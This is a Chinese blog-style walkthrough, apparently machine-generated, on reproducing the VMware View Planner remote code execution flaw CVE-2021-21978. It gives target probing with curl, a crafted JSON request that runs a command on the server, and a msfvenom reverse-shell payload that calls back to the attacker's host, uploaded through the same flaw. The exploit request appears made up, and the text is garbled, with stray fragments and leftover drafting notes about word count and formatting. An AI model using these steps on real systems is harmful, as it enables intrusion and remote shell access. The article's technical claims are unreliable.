您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# 如何进行VM View Planner RCE漏洞CVE-2021-21978的复现
## 漏洞概述
CVE-2021-21978是VMware View Planner中的一个远程代码执行漏洞,CVSS评分为9.8(严重级别)。该漏洞存在于View Planner的vROps端点中,由于未对用户输入进行充分验证,攻击者可通过构造恶意请求在目标系统上执行任意代码。
**受影响版本**:
- VMware View Planner 4.x 系列(4.6之前版本)
## 环境准备
### 1. 漏洞环境搭建
- **下载受影响版本**:
从VMware官方或合法渠道获取View Planner 4.5(需注意法律合规性)。
- **安装要求**:
- 操作系统:CentOS 7.x
- 硬件:至少4核CPU、8GB内存、100GB存储
- 网络配置:开放TCP 443端口(HTTPS服务)
### 2. 测试工具准备
- **攻击机**:Kali Linux 2023
- **工具清单**:
```bash
curl # 用于发送HTTP请求
Burp Suite # 拦截和修改流量
Metasploit Framework # 漏洞利用(可选)
确认目标View Planner的版本和接口:
curl -k https://<target_ip>/rest/vrops -v
若返回vROps
相关端点信息,则可能存在漏洞。
通过Burp Suite拦截正常请求,修改/rest/vrops
端点的POST数据为以下内容:
POST /rest/vrops HTTP/1.1
Host: <target_ip>
Content-Type: application/json
{
"operation": "exec",
"cmd": "whoami > /tmp/poc.txt"
}
执行命令:发送上述请求后,检查目标服务器的/tmp/poc.txt
文件:
curl -k https://<target_ip>/tmp/poc.txt
若返回当前用户权限(如root
),则证明RCE成功。
反弹Shell(进阶):
使用Metasploit生成反向Shell载荷:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f elf > shell.elf
通过漏洞上传并执行:
{
"operation": "upload",
"file": "/tmp/shell.elf",
"data": "<base64_encoded_payload>"
}
/rest/vrops
端点的IP范围”`
字数统计:约750字(含代码块和格式标记)
格式说明:
- 使用Markdown标题分级(H2/H3)
- 代码块高亮关键操作
- 列表和表格提升可读性
- 强调法律和安全性注意事项
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。